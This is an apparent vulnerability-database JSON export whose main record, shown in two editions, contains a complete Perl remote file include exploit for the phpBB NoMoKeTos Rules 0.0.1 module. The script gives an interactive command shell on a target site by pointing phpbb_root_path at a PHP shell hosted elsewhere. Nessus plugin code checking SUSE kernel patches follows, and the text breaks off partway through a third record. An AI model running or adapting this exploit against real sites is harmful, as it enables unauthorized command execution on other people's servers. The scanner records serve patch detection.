{"published": "2007-02-24T00:00:00", "id": "1337DAY-ID-1541", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:26:21", "bulletin": {"published": "2007-02-24T00:00:00", "id": "1337DAY-ID-1541", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 1.2, "modified": "2016-04-20T01:26:21"}}, "hash": "8dabde63987cde17442d010d38fe5b44e5e09c3f11b3de65da31db31da639abc", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:26:21", "edition": 1, "title": "phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit", "href": "http://0day.today/exploit/description/1541", "modified": "2007-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/1541", "references": [], "reporter": "bd0rk", "sourceData": "==============================================================\r\nphpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n# \r\n#Coded by bd0rk || SOH-Crew\r\n#\r\n#Usage: exploit.pl [target] [cmd shell] [shell variable]\r\n#\r\n#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik\r\n#\r\n#Vulnerable Code: include_once($phpbb_root_path . 'includes/functions_admin.'.$phpEx);\r\n#\r\n# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip\r\n\r\nuse LWP::UserAgent;\r\n\r\n$Path = $ARGV[0];\r\n$Pathtocmd = $ARGV[1];\r\n$cmdv = $ARGV[2];\r\n\r\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\r\n\r\nhead();\r\n\r\nwhile()\r\n{\r\n print \"[shell] \\$\";\r\nwhile(<STDIN>)\r\n {\r\n $cmd=$_;\r\n chomp($cmd);\r\n\r\n$xpl = LWP::UserAgent->new() or die;\r\n$req = HTTP::Request->new(GET =>$Path.'includes/functions_nomoketos_rules.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\";\r\n\r\n$res = $xpl->request($req);\r\n$return = $res->content;\r\n$return =~ tr/[\\n]/[....]/;\r\n\r\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\r\n\r\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\r\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\r\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\r\n\r\nif($return =~ /(.*)/)\r\n\r\n\r\n{\r\n $finreturn = $1;\r\n $finreturn=~ tr/[....]/[\\n]/;\r\n print \"\\r\\n$finreturn\\n\\r\";\r\n last;\r\n}\r\n\r\nelse {print \"[shell] \\$\";}}}last;\r\n\r\nsub head()\r\n {\r\n print \"\\n============================================================================\\r\\n\";\r\n print \" *phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit*\\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n }\r\nsub usage()\r\n {\r\n head();\r\n print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\\r\\n\\n\";\r\n print \" <Site> - Full path to RulesMod ex: http://www.site.com/ \\r\\n\";\r\n print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \\r\\n\";\r\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n print \" Bug Found by bd0rk \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n exit();\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "15e78a929d12dc6b5162e0b5465eac81", "key": "sourceHref"}, {"hash": "f4b02ff9e05fad4a64bd9ed66832870d", "key": "sourceData"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1fbd135b75f2a209c9f9a055c787d28f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "fae425339b3edd56597ebdc6cd0d2cf4", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "19e650fbcefa871bc99b8cbb24edf027af698096c81f2f5af45745deac3f3ec1", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2018-1520-1.NASL", "SUSE_SU-2018-1539-1.NASL", "SUSE_SU-2018-1538-1.NASL", "SUSE_SU-2018-1529-1.NASL", "SUSE_SU-2018-1519-1.NASL", "SUSE_SU-2018-1541-1.NASL", "SUSE_SU-2018-1540-1.NASL", "SUSE_SU-2018-1531-1.NASL", "SUSE_SU-2018-1514-1.NASL", "SUSE_SU-2018-1533-1.NASL"]}], "modified": "2018-03-09T23:30:25"}, "vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-09T23:30:25", "edition": 2, "title": "phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit", "href": "https://0day.today/exploit/description/1541", "modified": "2007-02-24T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/1541", "references": [], "reporter": "bd0rk", "sourceData": "==============================================================\r\nphpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n==============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#\r\n#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit\r\n# \r\n#Coded by bd0rk || SOH-Crew\r\n#\r\n#Usage: exploit.pl [target] [cmd shell] [shell variable]\r\n#\r\n#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik\r\n#\r\n#Vulnerable Code: include_once($phpbb_root_path . 'includes/functions_admin.'.$phpEx);\r\n#\r\n# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip\r\n\r\nuse LWP::UserAgent;\r\n\r\n$Path = $ARGV[0];\r\n$Pathtocmd = $ARGV[1];\r\n$cmdv = $ARGV[2];\r\n\r\nif($Path!~/http:\\/\\// || $Pathtocmd!~/http:\\/\\// || !$cmdv){usage()}\r\n\r\nhead();\r\n\r\nwhile()\r\n{\r\n print \"[shell] \\$\";\r\nwhile(<STDIN>)\r\n {\r\n $cmd=$_;\r\n chomp($cmd);\r\n\r\n$xpl = LWP::UserAgent->new() or die;\r\n$req = HTTP::Request->new(GET =>$Path.'includes/functions_nomoketos_rules.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die \"\\nCould Not connect\\n\";\r\n\r\n$res = $xpl->request($req);\r\n$return = $res->content;\r\n$return =~ tr/[\\n]/[....]/;\r\n\r\nif (!$cmd) {print \"\\nPlease Enter a Command\\n\\n\"; $return =\"\";}\r\n\r\nelsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)\r\n {print \"\\nCould Not Connect to cmd Host or Invalid Command Variable\\n\";exit}\r\nelsif ($return =~/^<br.\\/>.<b>Fatal.error/) {print \"\\nInvalid Command or No Return\\n\\n\"}\r\n\r\nif($return =~ /(.*)/)\r\n\r\n\r\n{\r\n $finreturn = $1;\r\n $finreturn=~ tr/[....]/[\\n]/;\r\n print \"\\r\\n$finreturn\\n\\r\";\r\n last;\r\n}\r\n\r\nelse {print \"[shell] \\$\";}}}last;\r\n\r\nsub head()\r\n {\r\n print \"\\n============================================================================\\r\\n\";\r\n print \" *phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit*\\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n }\r\nsub usage()\r\n {\r\n head();\r\n print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\\r\\n\\n\";\r\n print \" <Site> - Full path to RulesMod ex: http://www.site.com/ \\r\\n\";\r\n print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \\r\\n\";\r\n print \" <cmd variable> - Command variable used in php shell \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n print \" Bug Found by bd0rk \\r\\n\";\r\n print \"============================================================================\\r\\n\";\r\n exit();\r\n }\r\n\r\n\r\n\n# 0day.today [2018-03-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "20ab6902bea464630dc722772e42e22b", "key": "href"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "modified"}, {"hash": "2fd7b4682f52d5e26e7bf925f6fbcddf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}, {"hash": "d5a7c0a3d69d22d80f7e2d5f93886837", "key": "sourceData"}, {"hash": "5bb5d8bdc72f87e45feece9d2c0d2948", "key": "sourceHref"}, {"hash": "1fbd135b75f2a209c9f9a055c787d28f", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"nessus": [{"lastseen": "2019-02-21T01:40:12", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.61-52_106 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1512-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110347", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1512-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1512-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110347);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1512-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_106 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181512-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e92b9584\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1046=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_106-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_106-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:14", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 3.12.74-60_64_82 fixes several issues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in drivers/gpu/drm/udl/udl_fb.c had an integer-overflow vulnerability allowing local users with access to the udldrmfb driver to obtain full read and write permissions on kernel physical pages, resulting in a code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "SUSE_SU-2018-1528-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110361", "published": "2018-06-06T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1528-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1528-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110361);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/12/01 13:19:05\");\n\n script_cve_id(\"CVE-2017-13166\", \"CVE-2018-8781\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:1528-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_82 fixes several\nissues. The following security issues were fixed :\n\n - CVE-2017-13166: An elevation of privilege vulnerability\n in the kernel v4l2 video driver was fixed.\n (bsc#1085447).\n\n - CVE-2018-8897: A statement in the System Programming\n Guide of the Intel 64 and IA-32 Architectures Software\n Developer's Manual (SDM) was mishandled in the\n development of some or all operating-system kernels,\n resulting in unexpected behavior for #DB exceptions that\n are deferred by MOV SS or POP SS, as demonstrated by\n (for example) privilege escalation in Windows, macOS,\n some Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A;\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A; section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL is\n complete. OS kernels may not expect this order of events\n and may therefore experience unexpected behavior when it\n occurs (bsc#1090368).\n\n - CVE-2018-8781: The udl_fb_mmap function in\n drivers/gpu/drm/udl/udl_fb.c had an integer-overflow\n vulnerability allowing local users with access to the\n udldrmfb driver to obtain full read and write\n permissions on kernel physical pages, resulting in a\n code execution in kernel space (bsc#1090646).\n\n - bsc#1083125: Fixed kgraft: small race in reversion code\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1085447\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8781/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181528-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddec646b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1048=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1048=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_82-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_82-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_82-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_82-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:12", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 